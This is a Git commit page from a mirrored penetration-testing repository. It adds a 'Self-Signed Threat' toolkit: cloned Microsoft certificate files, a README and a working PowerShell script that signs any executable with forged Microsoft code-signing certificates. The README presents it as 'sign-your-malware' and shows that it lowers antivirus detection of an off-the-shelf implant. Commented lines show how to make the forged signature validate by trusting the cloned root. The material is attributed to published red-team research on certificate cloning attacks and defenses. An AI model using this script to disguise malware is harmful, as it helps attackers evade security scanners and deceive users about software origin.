mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 10:31:38 +01:00
added self-signed threat
This commit is contained in:
parent
6b7ff300ae
commit
8d24963a0c
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
Binary file not shown.
19
red-teaming/Self-Signed Threat/README.md
Normal file
19
red-teaming/Self-Signed Threat/README.md
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
## Easy-to-use test-it-yourself sign-your-malware
|
||||||
|
|
||||||
|
A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of Code Signing attacks.
|
||||||
|
|
||||||
|
Script was borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) and **all credits are his**.
|
||||||
|
|
||||||
|
As of 13/07/2022 this dumb trick still gets off the shelf malware evade detection of at least 8 modern security scanners.
|
||||||
|
|
||||||
|
| What | Result |
|
||||||
|
|------------------------------------------------------------------------------|-----------|
|
||||||
|
| Mythic Apollo.exe before fake-signing | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
|
||||||
|
| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
|
||||||
|
```
|
||||||
|
PS C:\> . .\Sign-Artifact.ps1
|
||||||
|
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
|
||||||
|
```
|
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
@ -0,0 +1,98 @@
|
|||||||
|
Function Sign-Artifact {
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Signs input executable file with a faked Microsoft code signing certificate.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
|
||||||
|
and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
|
||||||
|
|
||||||
|
Based on Matt Graeber's implementation:
|
||||||
|
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
|
||||||
|
#>
|
||||||
|
|
||||||
|
[CmdletBinding()]
|
||||||
|
param(
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[string]
|
||||||
|
$InputFile,
|
||||||
|
|
||||||
|
[Parameter(Mandatory=$True)]
|
||||||
|
[string]
|
||||||
|
$OutputFile,
|
||||||
|
|
||||||
|
[switch]
|
||||||
|
$Quiet
|
||||||
|
)
|
||||||
|
|
||||||
|
$Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
|
||||||
|
|
||||||
|
if (-not(Test-Path $InputFile))
|
||||||
|
{
|
||||||
|
Write-Error "[!] Input file does not exist! FilePath: $InputFile"
|
||||||
|
exit 1
|
||||||
|
}
|
||||||
|
|
||||||
|
if(Test-Path $OutputFile)
|
||||||
|
{
|
||||||
|
Remove-Item -Force $OutputFile
|
||||||
|
}
|
||||||
|
|
||||||
|
#
|
||||||
|
# Based on:
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
# We'll just store the cloned certificates in current user "Personal" store for now.
|
||||||
|
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
|
||||||
|
|
||||||
|
$MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
|
||||||
|
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
|
||||||
|
|
||||||
|
$MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
|
||||||
|
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
|
||||||
|
|
||||||
|
$MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
|
||||||
|
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
|
||||||
|
|
||||||
|
|
||||||
|
# Validate that that $OutputFile is not signed.
|
||||||
|
if($Verbose)
|
||||||
|
{
|
||||||
|
Write-Host "`n================================================================================================`n[.] Before signing: `n"
|
||||||
|
Get-AuthenticodeSignature -FilePath $InputFile
|
||||||
|
}
|
||||||
|
|
||||||
|
Copy-Item -Force $InputFile $OutputFile | Out-Null
|
||||||
|
|
||||||
|
|
||||||
|
# Sign $OutputFile with the cloned Microsoft leaf certificate.
|
||||||
|
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
|
||||||
|
|
||||||
|
# The certificate will not properly validate because the root certificate is not trusted.
|
||||||
|
|
||||||
|
# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
|
||||||
|
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
|
||||||
|
|
||||||
|
if($Verbose)
|
||||||
|
{
|
||||||
|
Write-Host "`n================================================================================================`n[+] After signing: `n"
|
||||||
|
Get-AuthenticodeSignature -FilePath $OutputFile
|
||||||
|
}
|
||||||
|
|
||||||
|
if(-not $Quiet -or $Verbose)
|
||||||
|
{
|
||||||
|
Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
|
||||||
|
}
|
||||||
|
|
||||||
|
# Save the root certificate to disk and import it into the current user root store.
|
||||||
|
# Upon doing this, the $OutputFile signature will validate properly.
|
||||||
|
# Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
|
||||||
|
# Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
|
||||||
|
#
|
||||||
|
# # You may need to start a new PowerShell process for the valid signature to take effect.
|
||||||
|
# Get-AuthenticodeSignature -FilePath $FilePath
|
||||||
|
}
|
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user